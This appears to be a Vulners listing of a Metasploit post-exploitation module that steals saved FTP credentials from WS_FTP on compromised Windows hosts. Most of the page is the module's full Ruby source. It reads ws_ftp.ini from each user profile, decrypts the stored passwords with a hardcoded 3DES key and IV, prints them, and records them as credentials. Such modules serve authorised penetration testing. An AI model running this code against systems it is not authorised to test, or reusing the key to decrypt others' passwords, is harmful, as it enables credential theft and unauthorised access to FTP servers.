Lucene search
K

Windows Gather WS_FTP Saved Password Extraction

🗓️ 10 Aug 2011 17:48:30Reported by theLightCosine <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 35 Views

This module extracts weakly encrypted saved FTP Passwords from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather WS_FTP Saved Password Extraction',
        'Description' => %q{
          This module extracts weakly encrypted saved FTP Passwords
          from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'theLightCosine'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_stat
            ]
          }
        }
      )
    )
  end

  def run
    print_status('Checking Default Locations...')
    grab_user_profiles.each do |user|
      next if user['AppData'].nil?

      check_appdata(user['AppData'] + '\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini')
      check_appdata(user['AppData'] + '\\Ipswitch\\WS_FTP Home\\Sites\\ws_ftp.ini')
    end
  end

  def check_appdata(path)
    client.fs.file.stat(path)
    print_status("Found File at #{path}")
    get_ini(path)
  rescue StandardError
    print_status("#{path} not found ....")
  end

  def get_ini(filename)
    config = client.fs.file.new(filename, 'r')
    parse = config.read
    ini = Rex::Parser::Ini.from_s(parse)

    ini.each_key do |group|
      next if group == '_config_'

      print_status("Processing Saved Session #{group}")
      host = ini[group]['HOST']
      host = host.delete '"'
      username = ini[group]['UID']
      username = username.delete '"'
      port =	ini[group]['PORT']
      passwd = ini[group]['PWD']
      passwd = decrypt(passwd)

      next if passwd.nil? || (passwd == '')

      port = 21 if port.nil?
      print_good("Host: #{host} Port: #{port} User: #{username}  Password: #{passwd}")
      service_data = {
        address: Rex::Socket.getaddress(host),
        port: port,
        protocol: 'tcp',
        service_name: 'ftp',
        workspace_id: myworkspace_id
      }

      credential_data = {
        origin_type: :session,
        session_id: session_db_id,
        post_reference_name: refname,
        username: username,
        private_data: passwd,
        private_type: :password
      }

      credential_core = create_credential(credential_data.merge(service_data))

      login_data = {
        core: credential_core,
        access_level: 'User',
        status: Metasploit::Model::Login::Status::UNTRIED
      }

      create_credential_login(login_data.merge(service_data))
    end
  end

  def decrypt(pwd)
    decoded = pwd.unpack('m*')[0]
    key = "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E\x34\x12\x78\x56\xab\x90\xef\xcd"
    iv = "\x34\x12\x78\x56\xab\x90\xef\xcd"
    des = OpenSSL::Cipher.new('des-ede3-cbc')

    des.decrypt
    des.key = key
    des.iv = iv
    result = des.update(decoded)
    final = result.split("\000")[0]
    return final
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation